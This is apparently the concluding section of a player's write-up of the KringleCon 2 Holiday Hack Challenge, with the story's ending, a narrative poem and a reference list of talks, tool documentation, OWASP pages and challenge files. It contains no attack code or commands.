Upon reaching the top of the Bell Tower, I am greeted by Santa, Krampus, and the Tooth Fairy, looking none too happy.  I greet Krampus first. “Hey there Krampus!”

 

“Congratulations on a job well done! Oh, by the way, I won the Frido Sleigh contest. I got 31.8% of the prizes, though I’ll have to figure that out. …,” he replied. 

 

“Yeah, you work on that buddy,” turning to the Tooth Fairy, “I’ll never really understand why you did it, but you’ll have a while to think about it.”

 

“You foiled my dastardly plan! I’m ruined! And I would have gotten away with it too, if it weren’t for you meddling kids!” she shrieked. 

 

“Yeah yeah and my little dog too.  I know.  Well, big guy.  Thanks for inviting me.” I laugh turning to Santa. 

 

He beams with pride, “You did it! Thank you! You uncovered the sinister plot to destroy the holiday season! Through your diligent efforts, we’ve brought the Tooth Fairy to justice and saved the holidays! Ho Ho Ho! The more I laugh, the more I fill with glee. And the more the glee, The more I’m a merrier me! Merry Christmas and Happy Holidays.”

 

Achievement Unlocked: You Won! - Through your diligent efforts, you brought the Tooth Fairy to justice and saved the holidays! Congratulations!  

 

After the credits roll, I turn to head back towards the train station when a strange object catches my eye.  Over Krampus’ left shoulder, I see a note. 

Oh, no!  Jack Frost!  I’ll have to keep an eye on things around here, but until then,

 

Merry Christmas To All & To All A Good Night!

 

The End

KringleCon Narrative

Whose grounds these are, I think I know

His home is in the North Pole though

He will not mind me traipsing here

To watch his students learn and grow

Some other folk might stop and sneer

"Two turtle doves, this man did rear?"

I'll find the birds, come push or shove

Objectives given: I'll soon clear

Upon discov'ring each white dove,

The subject of much campus love,

I find the challenges are more

Than one can count on woolen glove.

Who wandered thus through closet door?

Ho ho, what's this? What strange boudoir!

Things here cannot be what they seem

That portal's more than clothing store.

Who enters contests by the ream

And lives in tunnels meant for steam?

This Krampus bloke seems rather strange

And yet I must now join his team...

Despite this fellow's funk and mange

My fate, I think, he's bound to change.

What is this contest all about?

His victory I shall arrange!

To arms, my friends! Do scream and shout!

Some villain targets Santa's route!

What scum - what filth would seek to end

Kris Kringle's journey while he's out?

Surprised, I am, but "shock" may tend

To overstate and condescend.

'Tis little more than plot reveal

That fairies often do extend

And yet, despite her jealous zeal,

My skills did win, my hacking heal!

No dental dealer can so keep

Our red-clad hero in ordeal!

This Christmas must now fall asleep,

But next year comes, and troubles creep.

And Jack Frost hasn't made a peep,

And Jack Frost hasn't made a peep...

References

4) Statement from Google Booth at Student Union - “Google is a proud sponsor of KringleCon and the Holiday Hack Challenge. We wish you a happy holiday hacking season.”

5) Statement from SANS booth at Student Union - “Happy holidays from the best college in cybersecurity. Brilliant minds like yours belong at SANS.edu.”

6) Statement from Splunk booth at Student Union - “Splunk is proud to be a contributor to KringleCon and the Holiday Hack Challenge. Happy holidays from the Splunk security team!”

7) Statement from Swag Booth at Student Union with link to https://teespring.com/stores/kringlecon-swag  - “Want some KringleCon swag?  Profit? No, we don't make anything on swag sales.  We make our money from the cheer-powered crypto miners.”

 

8) How to configure iptables on CentOS - https://upcloud.com/community/tutorials/configure-iptables-centos/
9) Chrome Dev Tools - https://developers.google.com/web/tools/chrome-devtools
10) Firefox Developer Tools - https://developer.mozilla.org/en-US/docs/Tools
11) Safari Dev Tools - https://developer.apple.com/safari/tools/
12) Edge Dev Tools - https://docs.microsoft.com/en-us/microsoft-edge/devtools-guide/console
13) Curl man page - https://curl.haxx.se/docs/manpage.html
14) Lynx Dev Tools - https://xkcd.com/325/
15) Hint from SugarPlum Mary - “Linux Path - Green words matter, files must be found, and the terminal's $PATH matters.”
16) Shell is Only the Beginning – Carlos Perez - https://www.darkoperator.com/blog/2014/8/8/sysinternals-sysmon
17) Endgame Experts - Ross Wolf - https://www.endgame.com/our-experts/ross-wolf
18) EQL Threat Hunting – Joshua Wright - https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/
19) Hint from Alabaster Snowball - sudo -l says I can run a command as root. What does it do?
20) Hint from Alabaster Snowball - On Linux, a user's shell is determined by the contents of /etc/passwd
21) Machine Learning Use Cases for Cybersecurity – Chris Davis - https://www.youtube.com/watch?v=jmVPLwjm_zs&feature=youtu.be
22) MongoDB Documentation - https://docs.mongodb.com/manual/reference/command/listDatabases/#dbcmd.listDatabases
23) Reversing Crypto the Easy Way – Ron Bowes - https://www.youtube.com/watch?v=obJdpKDpFBA&feature=youtu.be
24) SANS PowerShell Cheat Sheet - https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf
25) Online CSV to Table Converter - https://www.becsv.com/csv-table.php
26) RITA - https://www.activecountermeasures.com/free-tools/rita/
27) Welcome to KringleCon 2 – Ed Skoudis - http://www.youtube.com/watch?v=iUF5pBv7ukM
28) Keynote: A Hunting We Must Go – John Strand - http://www.youtube.com/watch?v=jxOZ5u2CYWw
29) How to (Holiday) Hack It: Tips for Crushing CTFS & Pwning Pentests – Katie Knowles - http://www.youtube.com/watch?v=c02mH7F1xvU
30) Santa’s Naughty List: Holiday Themed Social Engineering – Snow - http://www.youtube.com/watch?v=HKLSmbOXJRU
31) Dashing Through the Logs – James Brodsky - http://www.youtube.com/watch?v=qbIhHhRKQCw
32) Web Apps: A Trailhead - Chris Elgee - http://www.youtube.com/watch?v=0T6-DQtzCgM
33) Learning to Escape Containers – Ian Coldwater - http://www.youtube.com/watch?v=S3gfEDEB_l0
34) Optical Decoding of Keys – Deviant Ollam - http://www.youtube.com/watch?v=KU6FJnbkeLA
35) Logs? Where we’re going we don’t need logs. – Mark Baggett - http://www.youtube.com/watch?v=Dx78oObfiBM
36) Telling Stories from the North Pole – Dave Kennedy - http://www.youtube.com/watch?v=9QuOhRGvryc
37) 5 Steps to Build and Lead a Team of Holly Jolly Hackers – John Hammond - http://www.youtube.com/watch?v=D5Nwg84cV1E
38) Over 90,000: Ups and Downs of my InfoSec Twitter Journey – Lesley Carhart - http://www.youtube.com/watch?v=RplOa_lqXvk
39) When Malware Goes Mobile, Quick Detection is Critical – Heather Mahalik - http://www.youtube.com/watch?v=IEbLOvT4Fts
40) Objective 3 Log Files - https://downloads.elfu.org/Security.evtx.zip
41) Objective 4 JSON Files - https://downloads.elfu.org/sysmon-data.json.zip
42) Objective 5 ZEEK Files - https://downloads.elfu.org/elfu-zeeklogs.zip
43) Graylog Searching Query Language - http://docs.graylog.org/en/3.1/pages/queries.html
44) SQL Injection from OWASP - https://www.owasp.org/index.php/SQL_Injection
45) SQLMAP Tamper Scripts for The Win - https://pen-testing.sans.org/blog/2017/10/13/sqlmap-tamper-scripts-for-the-win
46) Key and Lock Decoding Tools - https://github.com/deviantollam/decoding
47) Frido Sleigh Contest - https://fridosleigh.com/
48) Objective 8 Image Catalog - https://downloads.elfu.org/capteha_images.tar.gz
49) Objective 8 API Interface Wrapper - https://downloads.elfu.org/capteha_api.py
50) FloydHub Project - https://www.floydhub.com/cruggieri114/projects/tf-sans
51) Tensorflow Training Code - https://github.com/chrisjd20/img_rec_tf_ml_demo
52) Student Portal Server - https://studentportal.elfu.org/
53) Epoch Converter - https://www.epochconverter.com/
54) Crate - https://crate.elfu.org/ and http://sleighworkshopdoor.elfu.org
55) Zeek JSON Logs - https://downloads.elfu.org/http.log.gz
56) Sleigh Route Finder - srf.elfu.org
57) Parsing Zeek JSON Logs with JQ - https://pen-testing.sans.org/blog/2019/12/03/parsing-zeek-json-logs-with-jq-2
58) Testing for Local File Inclusion - https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
59) Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
60) Shellshock (software bug) - https://en.wikipedia.org/wiki/Shellshock_(software_bug)

D1. Pepper Minstix Graylog Incident Report -

D2. Initial Starting Point CSV -

D3. User-Agent String List -

D4. User-Agent Filtered CSV -

D5. Objective 12 IP list -

C1. Modified API Wrapper in txt format -

C2. Classifier python script in txt format -

C3. Decryptor script in txt format -